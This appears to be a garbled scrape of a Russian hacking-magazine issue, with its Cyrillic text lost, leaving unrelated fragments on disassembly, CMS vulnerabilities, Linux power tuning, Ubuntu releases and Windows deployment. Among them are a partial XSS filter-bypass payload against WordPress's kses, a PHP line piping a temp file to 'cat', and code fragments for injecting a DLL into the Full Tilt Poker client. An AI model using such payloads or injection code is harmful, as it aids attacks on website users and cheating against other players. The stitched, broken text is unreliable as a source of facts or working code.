PE Executable (*.scr *.exe). ,

dd ? ; DATA XREF: sub_405350+44

004049F7 xor ebx, ebx ;

sub_401110, 0x00403C3D, , API- (ExtTextOut, SetTextColor...),

dword ptr [eax+4Ch]

/ icq 884888, http://wap-chat.ru /

WordPress, Joomla, Drupal, Moodle , , CMS, PHP. , -: kses, Snoopy SpellChecker

return "cat ". $this->_tmpfile ." | " . $this->_

'mod/forum/post.php' => array('name'),

XSS WordPress kses

(Opera) <a href="%0Bjavascript:alert(document.

, IDA Pro KedaH3.exe

KedaH3.exe IDA Pro 5.3 (

2008 Second Life

Second Life Ginko Financial,

, Kir Rost (dvar1@xakep.ru).

, Robert Schweppes (r.schweppes@gmail.com)

Metal Gear Solid 4: Guns of the Patriots

# echo 5 > /proc/sys/vm/laptop_mode

# echo 1 > /sys/devices/system/cpu/sched_mc_

ethtool eth0, Wake-on

autoneg off , speed 100

, WiFi- PS-Poll (Power Save Poll

Compaq Evo N620c

Ubuntu 8.10 KUbuntu 8.10:

, , Canonical Ubuntu 8.10. 8.04 LTS ,

Adept (Version Upgrade).

Kubuntu Members KDE 4.1.1,

FLV MPEG ffmpeg:

Your Bootstrap DLL

public static int MyMethod(String pwzArgument)

Full Tilt Poker.

return (LRESULT) theInjector.

Full Tilt Poker

string sCard2 = what[2];

was number = -number;

Windows Deployment Services (WDS) , RIS;

PETools> imagex /unmount /commit d:\temp

Vista Update Integrator (www.winvistaside.

(New Answer File).

'-u2' UDF, 'b' , '-l' ,

sp_configure 'nested triggers'

PE Executable (.scr .exe). ,